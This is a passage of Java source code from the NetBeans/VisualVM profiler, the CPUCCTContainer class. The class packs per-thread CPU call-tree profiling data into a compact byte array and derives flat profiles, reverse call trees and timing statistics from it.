     Logo Search packages:       Sourcecode: visualvm version File versions  Download package CPUCCTContainer.java /* * DO NOT ALTER OR REMOVE COPYRIGHT NOTICES OR THIS HEADER. * * Copyright 1997-2007 Sun Microsystems, Inc. All rights reserved. * * The contents of this file are subject to the terms of either the GNU * General Public License Version 2 only ("GPL") or the Common * Development and Distribution License("CDDL") (collectively, the * "License"). You may not use this file except in compliance with the * License. You can obtain a copy of the License at * http://www.netbeans.org/cddl-gplv2.html * or nbbuild/licenses/CDDL-GPL-2-CP. See the License for the * specific language governing permissions and limitations under the * License. When distributing the software, include this License Header * Notice in each file and include the License file at * nbbuild/licenses/CDDL-GPL-2-CP. Sun designates this * particular file as subject to the "Classpath" exception as provided * by Sun in the GPL Version 2 section of the License file that * accompanied this code. If applicable, add the following below the * License Header, with the fields enclosed by brackets [] replaced by * your own identifying information: * "Portions Copyrighted [year] [name of copyright owner]" * * Contributor(s): * The Original Software is NetBeans. The Initial Developer of the Original * Software is Sun Microsystems, Inc. Portions Copyright 1997-2006 Sun * Microsystems, Inc. All Rights Reserved. * * If you wish your version of this file to be governed by only the CDDL * or only the GPL Version 2, indicate your decision by adding * "[Contributor] elects to include this software in this distribution * under the [CDDL or GPL Version 2] license." If you do not indicate a * single choice of license, a recipient has the option to distribute * your version of this file under either the CDDL, the GPL Version 2 or * to extend the choice of license to its licensees as provided above. * However, if you add GPL Version 2 code and therefore, elected the GPL * Version 2 license, then the option applies only if the new code is * made subject to such option by the copyright holder. */ package org.netbeans.lib.profiler.results.cpu; import org.netbeans.lib.profiler.ProfilerLogger; import org.netbeans.lib.profiler.global.InstrumentationFilter; import org.netbeans.lib.profiler.results.cpu.cct.nodes.MethodCPUCCTNode; import org.netbeans.lib.profiler.results.cpu.cct.nodes.RuntimeCPUCCTNode; import org.netbeans.lib.profiler.results.cpu.cct.nodes.TimedCPUCCTNode; import java.io.DataInputStream; import java.io.DataOutputStream; import java.io.IOException; import java.util.logging.Level; import java.util.logging.Logger; /** * An instance of this class contains a presentation-time CCT for the given thread in the compact, flattened form, that is also fast * to generate and save/retrieve. * Can represent data only on the method level "view" AKA "aggregation level". The CPUCCTClassContainer subclass provides functionality * to create and represent data at class and package aggregation level. The AllThreadsMergedCPUCCTContainer also supports views. A single * instance of CPUCCTContainer or its subclass can represent data only on a single aggregation level. * * @author Tomas Hurka * @author Misha Dmitriev */ 00065 public class CPUCCTContainer { //~ Static fields/initializers ----------------------------------------------------------------------------------------------- private static final Logger LOGGER = Logger.getLogger(CPUCCTContainer.class.getName()); // -- Data used for the compact representation of the CCT /* In the compactData array, data is packed in the following way: * |--------------------------------------------------------------------------------------------------------- * | methodID | nCalls |time0 | self |time1 | self |nbr. of subnodes | subnode0 | | subnodeN | * | | | | time0 |(if 2 timers | time1 | | offset | ... | offset | * | | | | | used) | | | | | | * |--------------------------------------------------------------------------------------------------------- * 2 bytes 4 bytes 5 bytes 5 bytes 5 bytes 5 bytes 2 bytes 3 or 4 bytes depending on the size of compactData array */ protected static final int OFS_METHODID = 0; protected static final int OFS_NCALLS = OFS_METHODID + 2; protected static final int OFS_TIME0 = OFS_NCALLS + 4; protected static final int OFS_SELFTIME0 = OFS_TIME0 + 5; protected static final int OFS_TIME1 = OFS_SELFTIME0 + 5; protected static final int OFS_SELFTIME1 = OFS_TIME1 + 5; protected static final int OFS_NSUBNODES1 = OFS_SELFTIME0 + 5; protected static final int OFS_NSUBNODES2 = OFS_SELFTIME1 + 5; protected static final int OFS_SUBNODE01 = OFS_NSUBNODES1 + 2; protected static final int OFS_SUBNODE02 = OFS_NSUBNODES2 + 2; protected static final int CHILD_OFS_SIZE_3 = 3; protected static final int CHILD_OFS_SIZE_4 = 4; // These are just the same-named xxxAbsCounts values converted into microseconds. So far used ONLY for informational purposes // (in "get internal statistics"), thus static is more or less tolerable (so far...) private static double timeInInjectedCodeInMS; private static double wholeGraphGrossTimeAbsInMS; //~ Instance fields ---------------------------------------------------------------------------------------------------------- protected CPUResultsSnapshot cpuResSnapshot; protected FlatProfileContainer cachedFlatProfile; protected PrestimeCPUCCTNode rootNode; protected String threadName; protected byte[] compactData; protected int[] invPerMethodId; // -- Temporary data used during flat profile generation protected long[] timePerMethodId0; protected long[] timePerMethodId1; protected boolean collectingTwoTimeStamps; // True if we collect two timestamps, absolute and thread CPU, for each method invocation protected boolean displayWholeThreadCPUTime; // True if we can calculate, and thus display, valid whole thread CPU time // Time spent in instrumentation, measured in counts protected double timeInInjectedCodeInAbsCounts; protected double timeInInjectedCodeInThreadCPUCounts; protected int childOfsSize = -1; protected int nodeSize; // Size of a single node above, not taking possible subnodeOffset fields into account protected int threadId; // -- Data that is supposed to be used for user information in various parts of the CPU results display // Gross time spent in the whole graph, measured in counts. It's measured by "starting the clock" when the root // method is entered, and "stopping the clock" when it exits. Time for hotswapping and on-line data processing // is factored out, so what is actually contained in wholeGraphGrossTime is (pure time + instrumentation time). // Note that independent of method timestamps collected, root method entry and exit events always have both // absolute and thread CPU time stamps. protected long wholeGraphGrossTimeAbs; protected long wholeGraphGrossTimeThreadCPU; // This is calculated as a sum of net times spent in all methods protected long wholeGraphNetTime0; protected long wholeGraphNetTime1; // This is calculated as the above gross time minus total time spent in instrumentation protected long wholeGraphPureTimeAbs; protected long wholeGraphPureTimeThreadCPU; private InstrumentationFilter filter; private PrestimeCPUCCTNodeFree reverseCCTRootNode; // private ProfilingSessionStatus status; private int[] nodeStack; private int childTotalNCalls; private int currentNodeStackSize; private int nodeStackPtr; // -- Temporary data used during reverse CCT generation private int selectedMethodId; // -- Temporary data used during above array generation private long childTotalTime0InTimerUnits; private long childTotalTime1InTimerUnits; private long totalInvNo; private TimingAdjusterOld timingAdjuster; private MethodInfoMapper methodInfoMapper = MethodInfoMapper.DEFAULT; //~ Constructors ------------------------------------------------------------------------------------------------------------- public CPUCCTContainer(TimedCPUCCTNode rtRootNode, CPUResultsSnapshot cpuResSnapshot, MethodInfoMapper methodInfoMapper, TimingAdjusterOld timingAdjuster, InstrumentationFilter usedFilter, int nNodes, double[] threadActiveTimesInCounts, int threadId, String threadName) { this(cpuResSnapshot); this.threadId = threadId; this.threadName = threadName; this.methodInfoMapper = methodInfoMapper; this.timingAdjuster = timingAdjuster; this.filter = usedFilter; collectingTwoTimeStamps = cpuResSnapshot.isCollectingTwoTimeStamps(); generateCompactData(rtRootNode, nNodes); calculateThreadActiveTimesInMS(threadActiveTimesInCounts); rootNode = new PrestimeCPUCCTNodeBacked(this, null, 0); if (rtRootNode.isRoot()) { rootNode.setThreadNode(); } } protected CPUCCTContainer(CPUResultsSnapshot cpuResSnapshot) { this.cpuResSnapshot = cpuResSnapshot; } //~ Methods ------------------------------------------------------------------------------------------------------------------ public CPUResultsSnapshot getCPUResSnapshot() { return cpuResSnapshot; } public int getChildOfsForNodeOfs(int nodeOfs, int childIdx) { if (childOfsSize == CHILD_OFS_SIZE_4) { return get4Bytes(nodeOfs + (collectingTwoTimeStamps ? OFS_SUBNODE02 : OFS_SUBNODE01) + (childOfsSize * childIdx)); } else { return get3Bytes(nodeOfs + (collectingTwoTimeStamps ? OFS_SUBNODE02 : OFS_SUBNODE01) + (childOfsSize * childIdx)); } } public boolean isCollectingTwoTimeStamps() { return collectingTwoTimeStamps; } public FlatProfileContainer getFlatProfile() { // if (cachedFlatProfile == null) { // generateFlatProfile(); // } // return cachedFlatProfile; return generateFlatProfile(); } public String[] getMethodClassNameAndSig(int methodId) { return cpuResSnapshot.getMethodClassNameAndSig(methodId, CPUResultsSnapshot.METHOD_LEVEL_VIEW); } // -- Methods for retrieving data for individual nodes public int getMethodIdForNodeOfs(int nodeOfs) { return get2Bytes(nodeOfs + OFS_METHODID); } public int getNCallsForNodeOfs(int nodeOfs) { return get4Bytes(nodeOfs + OFS_NCALLS); } public int getNChildrenForNodeOfs(int nodeOfs) { return get2Bytes(nodeOfs + (collectingTwoTimeStamps ? OFS_NSUBNODES2 : OFS_NSUBNODES1)); } public PrestimeCPUCCTNode getReverseCCT(int methodId) { return generateReverseCCT(methodId); } public PrestimeCPUCCTNode getRootNode() { return rootNode; } public long getSelfTime0ForNodeOfs(int nodeOfs) { return get5Bytes(nodeOfs + OFS_SELFTIME0); } public long getSelfTime1ForNodeOfs(int nodeOfs) { return get5Bytes(nodeOfs + OFS_SELFTIME1); } public long getSleepTime0ForNodeOfs(int nodeOfs) { return 0; } // TODO [wait] public int getThreadId() { return threadId; } public String getThreadName() { return threadName; } // Provided for information purposes (that is, the "get internal statistics" action) only. Since this stuff // is not used in any real calculations, it's more or less tolerable so far to have it static. public static double getTimeInInjectedCodeForDisplayedThread() { return timeInInjectedCodeInMS; } public long getTotalTime0ForNodeOfs(int nodeOfs) { return get5Bytes(nodeOfs + OFS_TIME0); } public long getTotalTime1ForNodeOfs(int nodeOfs) { return get5Bytes(nodeOfs + OFS_TIME1); } public long getWaitTime0ForNodeOfs(int nodeOfs) { return 0; } // TODO [wait] public static double getWholeGraphGrossTimeAbsForDisplayedThread() { return wholeGraphGrossTimeAbsInMS; } public long getWholeGraphNetTime0() { return wholeGraphNetTime0; } public long getWholeGraphNetTime1() { return wholeGraphNetTime1; } public long getWholeGraphPureTimeAbs() { return wholeGraphPureTimeAbs; } public long getWholeGraphPureTimeThreadCPU() { return wholeGraphPureTimeThreadCPU; } public boolean canDisplayWholeGraphCPUTime() { return displayWholeThreadCPUTime; } public void readFromStream(DataInputStream in) throws IOException { threadId = in.readInt(); threadName = in.readUTF(); collectingTwoTimeStamps = in.readBoolean(); int len = in.readInt(); compactData = new byte[len]; if (compactData.length > 0xFFFFFF) { childOfsSize = CHILD_OFS_SIZE_4; } else { childOfsSize = CHILD_OFS_SIZE_3; } in.readFully(compactData); nodeSize = in.readInt(); wholeGraphGrossTimeAbs = in.readLong(); wholeGraphGrossTimeThreadCPU = in.readLong(); timeInInjectedCodeInAbsCounts = in.readDouble(); timeInInjectedCodeInThreadCPUCounts = in.readDouble(); wholeGraphPureTimeAbs = in.readLong(); wholeGraphPureTimeThreadCPU = in.readLong(); wholeGraphNetTime0 = in.readLong(); wholeGraphNetTime1 = in.readLong(); totalInvNo = in.readLong(); displayWholeThreadCPUTime = in.readBoolean(); rootNode = new PrestimeCPUCCTNodeBacked(this, null, 0); if (this.getMethodIdForNodeOfs(0) == 0) { rootNode.setThreadNode(); } } // -- Serialization support public void writeToStream(DataOutputStream out) throws IOException { out.writeInt(threadId); out.writeUTF(threadName); out.writeBoolean(collectingTwoTimeStamps); out.writeInt(compactData.length); out.write(compactData); out.writeInt(nodeSize); out.writeLong(wholeGraphGrossTimeAbs); out.writeLong(wholeGraphGrossTimeThreadCPU); out.writeDouble(timeInInjectedCodeInAbsCounts); out.writeDouble(timeInInjectedCodeInThreadCPUCounts); out.writeLong(wholeGraphPureTimeAbs); out.writeLong(wholeGraphPureTimeThreadCPU); out.writeLong(wholeGraphNetTime0); out.writeLong(wholeGraphNetTime1); out.writeLong(totalInvNo); out.writeBoolean(displayWholeThreadCPUTime); } protected void setChildOfsForNodeOfs(int nodeOfs, int childIdx, int val) { if (childOfsSize == CHILD_OFS_SIZE_4) { store4Bytes(nodeOfs + (collectingTwoTimeStamps ? OFS_SUBNODE02 : OFS_SUBNODE01) + (childOfsSize * childIdx), val); } else { store3Bytes(nodeOfs + (collectingTwoTimeStamps ? OFS_SUBNODE02 : OFS_SUBNODE01) + (childOfsSize * childIdx), val); } } // -- Methods for setting data for individual nodes protected void setMethodIdForNodeOfs(int nodeOfs, int val) { store2Bytes(nodeOfs + OFS_METHODID, val); } protected void setNCallsForNodeOfs(int nodeOfs, int val) { store4Bytes(nodeOfs + OFS_NCALLS, val); } protected void setNChildrenForNodeOfs(int nodeOfs, int val) { store2Bytes(nodeOfs + (collectingTwoTimeStamps ? OFS_NSUBNODES2 : OFS_NSUBNODES1), val); } protected void setSelfTime0ForNodeOfs(int nodeOfs, long val) { store5Bytes(nodeOfs + OFS_SELFTIME0, val); } protected void setSelfTime1ForNodeOfs(int nodeOfs, long val) { store5Bytes(nodeOfs + OFS_SELFTIME1, val); } protected void setSleepTime0ForNodeOfs(int dataOfs, long waitTime0) { } // TODO [sleep should be stored separately in future versions] protected void setTotalTime0ForNodeOfs(int nodeOfs, long val) { store5Bytes(nodeOfs + OFS_TIME0, val); } protected void setTotalTime1ForNodeOfs(int nodeOfs, long val) { store5Bytes(nodeOfs + OFS_TIME1, val); } protected void setWaitTime0ForNodeOfs(int dataOfs, long waitTime0) { } // TODO [wait should be stored separately in future versions] protected void addFlatProfTimeForNode(int dataOfs) { int nChildren = getNChildrenForNodeOfs(dataOfs); if (nChildren > 0) { for (int i = 0; i < nChildren; i++) { int childOfs = getChildOfsForNodeOfs(dataOfs, i); addFlatProfTimeForNode(childOfs); } } int methodId = getMethodIdForNodeOfs(dataOfs); timePerMethodId0[methodId] += getSelfTime0ForNodeOfs(dataOfs); if (collectingTwoTimeStamps) { timePerMethodId1[methodId] += getSelfTime1ForNodeOfs(dataOfs); } invPerMethodId[methodId] += getNCallsForNodeOfs(dataOfs); } protected void addToReverseCCT(PrestimeCPUCCTNodeFree reverseNode, int methodId) { selectedMethodId = methodId; reverseCCTRootNode = reverseNode; currentNodeStackSize = 320; nodeStack = new int[currentNodeStackSize]; nodeStackPtr = 0; checkStraightGraphNode(0); nodeStack = null; // Free memory reverseCCTRootNode = null; // Ditto } /** * Walk all the elements of the main graph, looking for nodes with selectedMethodId signature. * Whenever one is found, add its path, in reversed form, to the rootNode. * When path is added, same-named nodes are merged until the first pair of different nodes is found. */ 00440 protected void checkStraightGraphNode(int dataOfs) { if (nodeStackPtr >= currentNodeStackSize) { int[] newNodeStack = new int[currentNodeStackSize * 2]; System.arraycopy(nodeStack, 0, newNodeStack, 0, currentNodeStackSize); nodeStack = newNodeStack; currentNodeStackSize = currentNodeStackSize * 2; } nodeStack[nodeStackPtr++] = dataOfs; if (getMethodIdForNodeOfs(dataOfs) == selectedMethodId) { addReversePath(); } int nChildren = getNChildrenForNodeOfs(dataOfs); for (int i = 0; i < nChildren; i++) { checkStraightGraphNode(getChildOfsForNodeOfs(dataOfs, i)); } nodeStackPtr--; } protected FlatProfileContainer generateFlatProfile() { preGenerateFlatProfile(); addFlatProfTimeForNode(0); return postGenerateFlatProfile(); } protected PrestimeCPUCCTNodeFree generateReverseCCT(int methodId) { selectedMethodId = methodId; currentNodeStackSize = 320; nodeStack = new int[currentNodeStackSize]; nodeStackPtr = 0; checkStraightGraphNode(0); PrestimeCPUCCTNodeFree ret = reverseCCTRootNode; nodeStack = null; // Free memory reverseCCTRootNode = null; // Ditto return ret; } protected int get2Bytes(int ofs) { return (((int) compactData[ofs] & 0xFF) << 8) | ((int) compactData[ofs + 1] & 0xFF); } protected int get3Bytes(int ofs) { return (((int) compactData[ofs++] & 0xFF) << 16) | (((int) compactData[ofs++] & 0xFF) << 8) | ((int) compactData[ofs++] & 0xFF); } protected int get4Bytes(int ofs) { return (((int) compactData[ofs++] & 0xFF) << 24) | (((int) compactData[ofs++] & 0xFF) << 16) | (((int) compactData[ofs++] & 0xFF) << 8) | ((int) compactData[ofs++] & 0xFF); } protected long get5Bytes(int ofs) { return (((long) compactData[ofs++] & 0xFF) << 32) | (((long) compactData[ofs++] & 0xFF) << 24) | (((long) compactData[ofs++] & 0xFF) << 16) | (((long) compactData[ofs++] & 0xFF) << 8) | ((long) compactData[ofs++] & 0xFF); } protected FlatProfileContainer postGenerateFlatProfile() { FlatProfileContainer fpc = new FlatProfileContainerBacked(this, timePerMethodId0, timePerMethodId1, invPerMethodId, timePerMethodId0.length); timePerMethodId0 = timePerMethodId1 = null; invPerMethodId = null; return fpc; } protected void preGenerateFlatProfile() { int totalMethods = cpuResSnapshot.getNInstrMethods(); timePerMethodId0 = new long[totalMethods]; if (collectingTwoTimeStamps) { timePerMethodId1 = new long[totalMethods]; } invPerMethodId = new int[totalMethods]; timePerMethodId0[0] = -1; // 0th element is a hidden "Thread" quazi-method. This prevents exposing it in a pathological case when all times are zero. } // -- Utility methods, not interesting enough to place earlier in the code protected void store2Bytes(int ofs, int data) { compactData[ofs] = (byte) ((data >> 8) & 0xFF); compactData[ofs + 1] = (byte) ((data) & 0xFF); } protected void store3Bytes(int ofs, int data) { int curPos = ofs; compactData[curPos++] = (byte) ((data >> 16) & 0xFF); compactData[curPos++] = (byte) ((data >> 8) & 0xFF); compactData[curPos++] = (byte) ((data) & 0xFF); } protected void store4Bytes(int ofs, int data) { int curPos = ofs; compactData[curPos++] = (byte) ((data >> 24) & 0xFF); compactData[curPos++] = (byte) ((data >> 16) & 0xFF); compactData[curPos++] = (byte) ((data >> 8) & 0xFF); compactData[curPos++] = (byte) ((data) & 0xFF); } protected void store5Bytes(int ofs, long data) { int curPos = ofs; compactData[curPos++] = (byte) ((data >> 32) & 0xFF); compactData[curPos++] = (byte) ((data >> 24) & 0xFF); compactData[curPos++] = (byte) ((data >> 16) & 0xFF); compactData[curPos++] = (byte) ((data >> 8) & 0xFF); compactData[curPos++] = (byte) ((data) & 0xFF); } private void addChild(TimedCPUCCTNode node, TimedCPUCCTNode parent) { if ((node == null) || (parent == null)) { return; } TimedCPUCCTNode compParent = null; TimedCPUCCTNode newChild = null; int filterStatus = node.getFilteredStatus(); if (!(node instanceof MethodCPUCCTNode)) { filterStatus = TimedCPUCCTNode.FILTERED_YES; } switch (filterStatus) { case TimedCPUCCTNode.FILTERED_YES: { compParent = parent; break; } case TimedCPUCCTNode.FILTERED_MAYBE: { if (node instanceof MethodCPUCCTNode) { methodInfoMapper.lock(false); try { String className = methodInfoMapper.getInstrMethodClass(((MethodCPUCCTNode) node).getMethodId()).replace('.', '/'); // NOI18N if (!filter.passesFilter(className)) { compParent = parent; } else { newChild = (TimedCPUCCTNode) node.clone(); compParent = newChild; } } finally { methodInfoMapper.unlock(); } } else { compParent = parent; } break; } case TimedCPUCCTNode.FILTERED_NO: { MethodCPUCCTNode existingChild = MethodCPUCCTNode.Locator.locate(((MethodCPUCCTNode) node).getMethodId(), parent.getChildren()); if (existingChild == null) { newChild = (TimedCPUCCTNode) node.clone(); compParent = newChild; } else { newChild = null; existingChild.addNCalls(node.getNCalls()); existingChild.addNCallsDiff(node.getNCallsDiff()); existingChild.addNetTime0(node.getNetTime0()); existingChild.addNetTime1(node.getNetTime1()); existingChild.addSleepTime0(node.getSleepTime0()); existingChild.addWaitTime0(node.getWaitTime0()); compParent = existingChild; } break; } default:ProfilerLogger.warning("Unknown filtered status (" + filterStatus + ") for " + node); // NOI18N } int nChildren = (node.getChildren() != null) ? node.getChildren().size() : 0; for (int i = 0; i < nChildren; i++) { addChild((TimedCPUCCTNode) node.getChildren().getChildAt(i), compParent); } if (newChild != null) { parent.attachNodeAsChild(newChild); } else { if (!parent.isRoot()) { // no propagation of filtered-out data to the Thread level node parent.addNetTime0(node.getNetTime0()); parent.addNCallsDiff(node.getNCalls()); if (collectingTwoTimeStamps) { parent.addNetTime1(node.getNetTime1()); } } else { // threadTimeCompensation0 += node.getNetTime0(); // if (collectingTwoTimeStamps) { // threadTimeCompensation1 += node.getNetTime1(); // } } } } /** * Add the whole reverse path contained in the nodeStack to the reverse call tree, merging nodes where appropriate. * Most of the complexity of the code is due to handling of the intermediate "from" nodes. */ 00651 private void addReversePath() { PrestimeCPUCCTNodeFree curNode = null; // This is effectively a node above the root node - which is non-existent int stackTopIdx = nodeStackPtr - 1; for (int i = stackTopIdx; i >= 0; i--) { int sourceNodeOfs = nodeStack[i]; int sourceNodeId = getMethodIdForNodeOfs(sourceNodeOfs); if (sourceNodeId == 0) { return; // It doesn't make sense to add "Thread" nodes to the reverse tree } boolean matchingChildFound = false; if (i < stackTopIdx) { // sourceNodeOfs is some intermediate node PrestimeCPUCCTNodeFree[] curNodeChildren = (PrestimeCPUCCTNodeFree[]) curNode.getChildren(); if (curNodeChildren != null) { for (int j = 0; j < curNodeChildren.length; j++) { if (curNodeChildren[j].getMethodId() == sourceNodeId) { curNode = curNodeChildren[j]; if (curNode.isContextCallsNode()) { // Skip the "context calls" node if it exists int prevSourceNodeOfs = nodeStack[i + 1]; mergeBySelfTime(curNode, prevSourceNodeOfs); curNode = (PrestimeCPUCCTNodeFree) curNode.getChildren()[0]; } mergeBySelfTime(curNode, sourceNodeOfs); matchingChildFound = true; break; } } } } else { // sourceNode is the topmost stack node curNode = reverseCCTRootNode; if (curNode == null) { curNode = createChildlessCopyBySelfTime(sourceNodeOfs); reverseCCTRootNode = curNode; } else { mergeBySelfTime(curNode, sourceNodeOfs); } matchingChildFound = true; } if (!matchingChildFound) { // sourceNode may only be an intermediate node PrestimeCPUCCTNodeFree newNode = createChildlessCopyBySelfTime(sourceNodeOfs); PrestimeCPUCCTNodeFree[] curNodeChildren = (PrestimeCPUCCTNodeFree[]) curNode.getChildren(); if (curNodeChildren != null) { // For the given node, add an intermediate "context calls" node. If previously there was just one child, // insert another "context calls" node for it. int prevSourceNodeOfs = nodeStack[i + 1]; if (curNodeChildren.length == 1) { // Insert a context node for the already existing single child PrestimeCPUCCTNodeFree origFirstChild = curNodeChildren[0]; PrestimeCPUCCTNodeFree ccNode = curNode.createChildlessCopy(); subtractNodeDataBySelfTime(ccNode, prevSourceNodeOfs); // Undo the results of merging with the parent of sourceNode ccNode.setMethodId(origFirstChild.getMethodId()); ccNode.setContextCallsNode(); curNodeChildren[0] = ccNode; ccNode.parent = curNode; ccNode.addChild(origFirstChild); origFirstChild.parent = ccNode; } PrestimeCPUCCTNodeFree ccNode = createChildlessCopyBySelfTime(prevSourceNodeOfs); ccNode.setMethodId(getMethodIdForNodeOfs(sourceNodeOfs)); ccNode.setContextCallsNode(); curNode.addChild(ccNode); ccNode.parent = curNode; curNode = ccNode; } curNode.addChild(newNode); newNode.parent = curNode; curNode = newNode; } } } /** * After presentation-time CCT is generated, calculate various special time values stored in this instance */ 00742 private void calculateThreadActiveTimesInMS(double[] threadActiveTimesInCounts) { //!!! Delete this comment after deciding what to do with the whole issue. // In the code below, '+=' is caused by the fact that this method may be called multiple times when in getRootNode() we // generate CCTs for all threads. In the default single-thread case the real value is just added to the initial zero value. wholeGraphGrossTimeAbs = (long) threadActiveTimesInCounts[0]; wholeGraphGrossTimeThreadCPU = (long) threadActiveTimesInCounts[1]; timeInInjectedCodeInAbsCounts = threadActiveTimesInCounts[2]; timeInInjectedCodeInThreadCPUCounts = threadActiveTimesInCounts[3]; wholeGraphGrossTimeAbsInMS += ((wholeGraphGrossTimeAbs * 1000.0) / timingAdjuster.getInstrTimingData().timerCountsInSecond0); timeInInjectedCodeInMS += ((timeInInjectedCodeInAbsCounts * 1000.0) / timingAdjuster.getInstrTimingData().timerCountsInSecond0); // Note that here we have to use status.timerCountsInSecond[x] explicitly instead of timerCountsInSecond0/1 (which may correspond to wrong time type) wholeGraphPureTimeAbs += (int) ((((double) wholeGraphGrossTimeAbs - timeInInjectedCodeInAbsCounts) * 1000000) / timingAdjuster.getInstrTimingData().timerCountsInSecond1); //System.err.println("*** wholeGraphTimeAbs gross (cnts) = " + wholeGraphGrossTimeAbs + ", pure (mcs) = " + wholeGraphPureTimeAbs); if (wholeGraphGrossTimeThreadCPU > 0) { // Otherwise it means we couldn't calculate it and it shouldn't be displayed displayWholeThreadCPUTime = true; wholeGraphPureTimeThreadCPU += (int) ((((double) wholeGraphGrossTimeThreadCPU - timeInInjectedCodeInThreadCPUCounts) * 1000000) / timingAdjuster.getInstrTimingData().timerCountsInSecond1); //System.err.println("*** wholeGraphTimeThreadCPU gross (cnts) = " + wholeGraphGrossTimeThreadCPU + ", pure (mcs) = " + wholeGraphPureTimeThreadCPU); //System.err.println("*** timeInInjectedCode (mcs) = " + (timeInInjectedCodeInAbsCounts * 1000000 / status.timerCountsInSecond[0])); } else { displayWholeThreadCPUTime = false; } // Take measures in case timer's low resolution has caused funny results if (wholeGraphPureTimeAbs < 0) { wholeGraphPureTimeAbs = 0; } if (wholeGraphPureTimeThreadCPU < 0) { wholeGraphPureTimeThreadCPU = 0; } wholeGraphNetTime0 += get5Bytes(0 + OFS_TIME0); if (collectingTwoTimeStamps) { wholeGraphNetTime1 += get5Bytes(0 + OFS_TIME1); } } private PrestimeCPUCCTNodeFree createChildlessCopyBySelfTime(int sourceNodeDataOfs) { PrestimeCPUCCTNodeFree node = new PrestimeCPUCCTNodeFree(this, null, getMethodIdForNodeOfs(sourceNodeDataOfs)); mergeBySelfTime(node, sourceNodeDataOfs); return node; } // private long threadTimeCompensation0, threadTimeCompensation1; private TimedCPUCCTNode filterCCT(final TimedCPUCCTNode rootNode) { TimedCPUCCTNode newRoot = (TimedCPUCCTNode) rootNode.clone(); // threadTimeCompensation0 = threadTimeCompensation1 = 0; int nChildren = (rootNode.getChildren() != null) ? rootNode.getChildren().size() : 0; for (int i = 0; i < nChildren; i++) { addChild((TimedCPUCCTNode) rootNode.getChildren().getChildAt(i), newRoot); } // long time0, time1; // time0 = newRoot.getNetTime0() - threadTimeCompensation0; newRoot.setNetTime0(0); if (collectingTwoTimeStamps) { // time1 = newRoot.getNetTime1() - threadTimeCompensation1; newRoot.setNetTime1(0); } return newRoot; } private void generateCompactData(TimedCPUCCTNode rootNode, int nNodes) { nodeSize = collectingTwoTimeStamps ? OFS_SUBNODE02 : OFS_SUBNODE01; childOfsSize = CHILD_OFS_SIZE_3; int arraySize = (nodeSize * nNodes) + (childOfsSize * (nNodes - 1)); // For each node, except the root one, there is a parent node that references it with childOfsSize bytes long offset if (arraySize > 0xFFFFFF) { // compactData is to big to use 3 bytes subnode offsets childOfsSize = CHILD_OFS_SIZE_4; arraySize = (nodeSize * nNodes) + (childOfsSize * (nNodes - 1)); } if (LOGGER.isLoggable(Level.FINEST)) { LOGGER.finest("generateCompact data: nNodes " + nNodes); // NOI18N LOGGER.finest("generateCompact data: node size " + nodeSize); // NOI18N LOGGER.finest("generateCompact data: array size " + arraySize); // NOI18N LOGGER.finest("generateCompact data: child offset " + childOfsSize); // NOI18N } compactData = new byte[arraySize]; rootNode = filterCCT(rootNode); generateMirrorNode(rootNode, 0); } /** * Generates an equivalent of rtNode in the compact data. Returns the offset right after the last generated node, which * is this node if it has no children, or the last recursive child of this node. */ 00843 private int generateMirrorNode(final TimedCPUCCTNode rtNode, final int dataOfs) { if (LOGGER.isLoggable(Level.FINEST)) { LOGGER.finest("Generate mirror node for ofs: " + dataOfs + ", node: " + rtNode); // NOI18N } long thisNodeTotalTime0InTimerUnits = 0; long thisNodeTotalTime1InTimerUnits = 0; int nCallsFromThisNode = 0; int totalNCallsFromThisNode = 0; generateNodeBase(rtNode, dataOfs); totalInvNo += rtNode.getNCalls(); RuntimeCPUCCTNode.Children nodeChildren = rtNode.getChildren(); int nChildren = (nodeChildren != null) ? nodeChildren.size() : 0; int nextNodeOfs = dataOfs + nodeSize + (nChildren * childOfsSize); nCallsFromThisNode += rtNode.getNCallsDiff(); if (nChildren > 0) { int childCounter = 0; for (int i = 0; i < nChildren; i++) { RuntimeCPUCCTNode aNode = nodeChildren.getChildAt(i); if (aNode instanceof MethodCPUCCTNode) { // TODO replace "instanceof" by a visitor implementation setChildOfsForNodeOfs(dataOfs, childCounter, nextNodeOfs); nextNodeOfs = generateMirrorNode((MethodCPUCCTNode) aNode, nextNodeOfs); thisNodeTotalTime0InTimerUnits += childTotalTime0InTimerUnits; // Completely uncleansed time if (collectingTwoTimeStamps) { thisNodeTotalTime1InTimerUnits += childTotalTime1InTimerUnits; // Ditto } nCallsFromThisNode += ((MethodCPUCCTNode) aNode).getNCalls(); totalNCallsFromThisNode += childTotalNCalls; childCounter++; } } } // Calculate cleansed self time /* PROTOTYPE [wait] long time = (long) (((double) rtNode.netTime0 - rtNode.waitTime0 - rtNode.nCalls * timingData.methodEntryExitInnerTime0 - nCallsFromThisNode * timingData.methodEntryExitOuterTime0) * 1000000 / timingData.timerCountsInSecond0); */ long time = (long) timingAdjuster.adjustTime(rtNode.getNetTime0(), rtNode.getNCalls(), nCallsFromThisNode, false); // (long) (((double) rtNode.getNetTime0() - rtNode.getNCalls() * timingData.methodEntryExitInnerTime0 // - nCallsFromThisNode * timingData.methodEntryExitOuterTime0) * 1000000 / timingData // .timerCountsInSecond0); if (time < 0) { // It may happen that for some very short methods the resulting time, after subtracting the instrumentation time, gets negative. // When I calculated some concrete results using the (now-commented) code below, it appeared that for such methods the net // time per call, in timer counts, is in the order of -0.1.. -0.2. In other words, it's a very small error caused by the // hi-res timer (on Windows at least) being still too coarse-grain if just a few machine instructions are to be measured; and // possibly insufficient precision of our advanced determination of instrumentation time. // Setting the result to zero seems reasonable in this situation. //if (nCallsFromThisNode == 0) { // Net time per call, in counts //double ntpc = ((double)cgNode.netTime - thisNode.nCalls * methodEntryExitInnerTime - nCallsFromThisNode * methodEntryExitOuterTime) / thisNode.nCalls; //System.out.println("*** N: id= " + thisNode.methodId + ", cls= " + thisNode.nCalls + ", netTime= " + cgNode.netTime + ", nCFrom= " + nCallsFromThisNode + ", res = " + thisNode.netTime + ", ntpc = " + ntpc); //} time = 0; } setSelfTime0ForNodeOfs(dataOfs, time); setWaitTime0ForNodeOfs(dataOfs, rtNode.getWaitTime0()); setSleepTime0ForNodeOfs(dataOfs, rtNode.getSleepTime0()); thisNodeTotalTime0InTimerUnits += rtNode.getNetTime0(); // Uncleansed time for this node and all its children childTotalTime0InTimerUnits = thisNodeTotalTime0InTimerUnits; // It will be effectively returned by this method // Calculate cleansed total time time = (long) timingAdjuster.adjustTime(thisNodeTotalTime0InTimerUnits, rtNode.getNCalls(), totalNCallsFromThisNode, false); // time = (long) (((double) thisNodeTotalTime0InTimerUnits - rtNode.getNCalls()* timingData.methodEntryExitInnerTime0 // - totalNCallsFromThisNode * 